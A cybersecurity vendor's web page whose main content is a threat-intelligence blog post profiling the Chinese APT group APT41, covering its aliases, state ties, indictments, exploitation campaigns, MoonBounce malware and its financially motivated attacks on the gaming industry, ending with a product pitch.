WEBINAR | From Deal to Defense: Unifying Cybersecurity Post-M&A
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Find cyber threats that have evaded your defenses.
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Brands of the world trust ReliaQuest to achieve their security goals.
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
The latest white papers focused on security operations strategy, technology & insight.
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
February 20, 2024
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
Stealthy, sustained, and frequently state-backed, advanced persistent threats (APTs for short) are often the leading antagonists of the cyber threat intelligence scene. But with murky intelligence, unclear goals, and inconsistent naming conventions (do we really need six names for one group?), making sense of APT groups is often easier said than done for both the average reader and experts alike.
APTs are so-named due to their advanced technical sophistication, their persistent access or attempts to access systems, and the significant threat they pose to nation states, companies, and/or individuals. To achieve all three, APT groups are usually linked to national governments, which may give them resources, turn a blind eye to their criminal activity, or even provide direction to the groups’ operations. Such groups are usually tied to the so-called big four of APT threats—Russia, the People’s Republic of China (PRC), Iran, and North Korea—but many support the interests of countries including Turkey, Israel, Pakistan, India, South Korea, and the US.
This blog is the first in a series aimed at demystifying APT groups around the world, as well as their group dynamics, goals, and techniques. With Chinese APTs making waves during tensions with Taiwan and the US, infamous Chinese APT group “APT41” is the first up to bat.
APT41 (aka Wicked Panda, BARIUM, Wicked Spider, Blackfly, Double Dragon, and so on) is one of the most prolific Chinese threat groups. The group’s many cyber-espionage campaigns are likely motivated by Chinese political and economic goals, including the Belt and Road Initiative (BRI), and Made In China 2025 (MIC 2025). However, unlike many politically motivated APT groups, APT41 poses a dual threat, being known to have conducted financially motivated ransomware attacks and attacks against the video game industry in particular. APT41 is a natural starting point for this series, due to the wealth of internal information we have about the group. Unlike most APT groups, for whom stealth is paramount, we know several members of APT41, where they are based, and what techniques they usually use. This is in part due to US federal indictments of five of its members in August 2019 and August 2020 on charges including wire fraud, identity theft, and racketeering, as well as unauthorized computer intrusions affecting over 100 companies and individuals worldwide.
According to these indictments, much of APT41’s activity stems from the Chinese city of Chengdu, a growing technology hub in the southwestern province of Sichuan. Famous for its giant pandas (the animal, not the APTs), the city is also gaining a reputation for both white and black hat hackers. This includes hosting the Tianfu Cup, the PRC’s premier computer hacking contest and response to the West’s Pwn2Own. APT41’s known members are therefore largely network security engineers, many of whom used to operate under the guise of a supposedly legitimate network security company known as Chengdu 404. Controversial whistleblowing site Intrusion Truth also claims that the group has significant ties to Sichuan University and Chengdu University of Information Technology, and may use these links for recruitment purposes.
APT41 members have ties with the Chinese Ministry of State Security (MSS). One member claimed to be “very close” with the “GA” (aka MSS), and claimed that the MSS would protect him “unless something very big happens.” Other members have also performed legitimate contracting work for the MSS. However, it is unlikely that the group works as part of the Chinese security apparatus. Many group members have criminal rap sheets or ties to cyber-criminal entities, such as the Network Crack Program Hacker (NCPH) group. According to the FBI, members have also made statements about not targeting domestic Chinese entities so as to avoid the ire of the MSS. It is more likely that the group conducts cyber-espionage activity on a more contractual basis for the MSS, although whether this is motivated by patriotism, money, commuted prison sentences, or simply the “lolz” is unconfirmed.
Despite the indictments of some of its members, no extradition treaty and no Chinese political goodwill mean that APT41 is still free to pose a menacing cyber-espionage threat. APT41 has successfully compromised government and critical infrastructure networks around the world and has been attributed to more cyber-espionage campaigns than we have time to name. The group is notable as a pioneer of supply-chain attacks—i.e. attacks on vulnerable third-party tools and software to gain access to a target—and also frequently uses vulnerability exploitation and custom malware to compromise victims.
Examples of vulnerability exploitation by APT41 include supply-chain attacks on US state government networks. From May 2021 to February 2022, APT41 gained access to six state networks by exploiting vulnerabilities. This included the “Log4j” remote code execution (RCE) zero-day in USAHerds, an application for tracking disease in cows and other livestock (commence sad moo noises). From January to March 2020, APT41 also conducted one of the broadest vulnerability exploitation campaigns observed in recent years, exploiting Citrix, Zoho, and Cisco vulnerabilities. The campaign impacted entities in at least 20 countries from at least 19 sectors.
In addition to opportunistic vulnerability exploitation, the group has developed their own malware to conduct attacks, such as the Unified Extensible Firmware Interface (UEFI) malware “MoonBounce”. Identified in January 2022, MoonBounce was reportedly used to exfiltrate sensitive personal and intellectual property information from targets including transportation networks. UEFI rootkits are highly stealthy and persistent malware, and are difficult to detect on victim machines. One researcher dubbed MoonBounce “the most advanced UEFI firmware implant discovered in the wild to date”, an uncomfortable insight into APT41’s technical capabilities.
APT41 is therefore stealthy, technologically capable, and persistent in its cyber-espionage attacks: all unfortunate hallmarks of an APT group. But while most of its cyber-espionage attacks are conducted—quite literally—by day, it also conducts cyber-criminal campaigns by night.
Another argument that APT41 operates only partially in the nexus of Chinese government control is Mandiant’s research into the group’s campaign types and operational times. During Beijing working hours, the group predominantly conducts cyber-espionage attacks, while at night, ransomware attacks and money-making schemes prevail. As most Chinese government-linked APT groups do not conduct financially motivated attacks, it is likely that the MSS turns a blind eye to these activities, so long as APT41 continues to provide them with valuable intelligence.
APT41 has frequently targeted the video game and online gambling industry in such attacks. The group has deployed ransomware against video game companies, and has conducted watering hole attacks against online gamblers. Watering hole attacks are attacks that compromise and infect commonly used websites with malware to target site visitors. APT41 has also compromised video game systems to fraudulently obtain in-game currencies and digital goods (think cool skins, artifacts, and weapons) in order to sell them to legitimate gamers for profit. In line with the group’s sophistication, it also apparently monitored gaming companies’ fraud detection teams in order to evade its own detection, and compromised other cyber-criminal groups conducting similar attacks in order to steal their goods and eliminate competition.
For king and country (or for general secretary and party) is apparently not enough for APT41. The group is either not paid enough by the Chinese government, or greed has simply gotten the better of its members and pushed them to lead a double life. Either way, the group’s dual motivations, and broad tactics, techniques, and procedures (TTPs) mean that it poses a threat to many industries, from many angles.
For a group of network security professionals from Chengdu, APT41’s scope and impact have been considerable. The group poses an ongoing challenge to governments and security teams alike due to its unpredictable motivations and TTPs, be they cyber-espionage or cyber-criminal in nature. Although rising tensions between the PRC and Taiwan have slowed since US House Speaker Nancy Pelosi’s visit in July, it is realistically possible that APT41 will choose Taiwanese organizations as its next target in retaliation for the visit. To stay informed of APT41’s latest activity, sign up for a demo of SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) here.
Keep an eye out for the next installment of our APT Spotlight Series. The Photon Research Team maintains a library of more than 500 threat profiles to choose from, which help our clients navigate the quickly evolving threat landscape. To see how SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) can work for you, take a test drive for seven days and explore our research in depth.